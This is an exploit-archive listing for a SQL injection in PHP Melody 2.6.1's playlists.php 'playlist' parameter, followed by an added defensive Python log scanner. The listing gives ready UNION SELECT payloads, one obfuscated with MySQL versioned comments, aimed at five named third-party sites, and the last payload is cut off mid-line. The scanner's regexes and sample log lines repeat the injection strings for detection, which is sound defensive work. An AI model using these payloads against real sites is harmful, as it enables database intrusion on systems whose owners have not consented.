zdt | Venkat Rajgor | 1337DAY-ID-28863
History: Oct 25, 2017 - 12:00 a.m.

PHP Melody 2.6.1 SQL Injection Vulnerability

2017-10-25 00:00:00
Venkat Rajgor
0day.today

EPSS: 0.009 (percentile: 83.2%)

Exploit for php platform in category web applications

---------------------------------------------------
PHP Melody 2.6.1 SQL Injection
---------------------------------------------------
 ###################################################
 [+] Author        :  Venkat Rajgor
 [+] Email         :  [email protected]
 [+] Vulnerability :  SQL injection
 ###################################################

---------CMS info----------------
name     : PHP Melody version 2.6.1
email    : [email protected]
download : http://www.phpsugar.com
web      : http://www.phpsugar.com
price    : $39 USD

Vulnerable parameter:  playlists.php?playlist='

Demo Sites:

[+] http://www.donlugo.tv/playlists.php?playlist=-1276' UNION SELECT
null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),
null,null,null,null,null,null,null,null,null-- -

[+] http://www.businessfight.com/playlists.php?playlist=-1276' UNION SELECT
null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),
null,null,null,null,null,null,null,null,null-- -

[+] http://www.salsamalsa.com/playlists.php?playlist=-1276' UNION SELECT
null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),
null,null,null,null,null,null,null,null,null-- -

[+] http://www.mathstube.org.uk/playlists.php?playlist=-1276' UNION SELECT
null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),
null,null,null,null,null,null,null,null,null-- -

[+] http://www.hahuvideos.info/playlists.php?playlist=-1276'
/*!00000UNION*/ /*!00000SELECT*/ null,concat+(0x223c2f613e3c2f6469763e3c2f64
69763e,version(),0x3c212d2d),null,null,null,null,null,

#  0day.today [2018-03-16]  #
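
Added example (not part of the original advisory and not PHP Melody code): a defender-side access-log check for the `playlist` parameter of playlists.php named above. It URL-decodes the value and unwraps MySQL versioned comments such as the `/*!00000UNION*/` form before matching; the combined-style log format, the sample lines and all function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# MySQL executes the body of /*!NNNNN ... */ comments, so unwrap them before matching.
VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges), not taken from any real log.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Oct/2017:10:00:01 +0000] "GET /playlists.php?playlist=abc123 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [25/Oct/2017:10:02:11 +0000] "GET /playlists.php?playlist=-1276%27%20UNION%20SELECT%20null,null--%20- HTTP/1.1" 200 7344',
    '198.51.100.7 - - [25/Oct/2017:10:02:40 +0000] "GET /playlists.php?playlist=-1276%27%20/*!00000UNION*/%20/*!00000SELECT*/%20null,null HTTP/1.1" 200 7344',
    '192.0.2.33 - - [25/Oct/2017:10:03:02 +0000] "GET /watch.php?vid=union%20select HTTP/1.1" 200 901',
    '203.0.113.5 - - [25/Oct/2017:10:04:19 +0000] "GET /playlists.php?playlist=x%27 HTTP/1.1" 500 312',
]

def normalize(value):
    """Unwrap versioned comments, drop plain comments, collapse whitespace."""
    value = VERSIONED_COMMENT.sub(r" \1 ", value)
    value = PLAIN_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip()

def classify(value):
    """Return a reason for a decoded playlist value, or None if nothing matched."""
    norm = normalize(value)
    if UNION_SELECT.search(norm):
        return "union-select"
    if "'" in norm:
        return "quote"
    return None

def scan(lines):
    """Return (client_ip, reason) for each suspicious request to playlists.php."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/playlists.php"):
            continue  # scope the rule to the script named in the advisory
        for value in parse_qs(url.query, keep_blank_values=True).get("playlist", []):
            reason = classify(value)  # parse_qs has already percent-decoded the value
            if reason:
                hits.append((line.split()[0], reason))
    return hits

if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(ip, reason)
```

A hit means the request was attempted, not that it succeeded; compare response sizes and status codes for the flagged lines against normal playlist requests.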
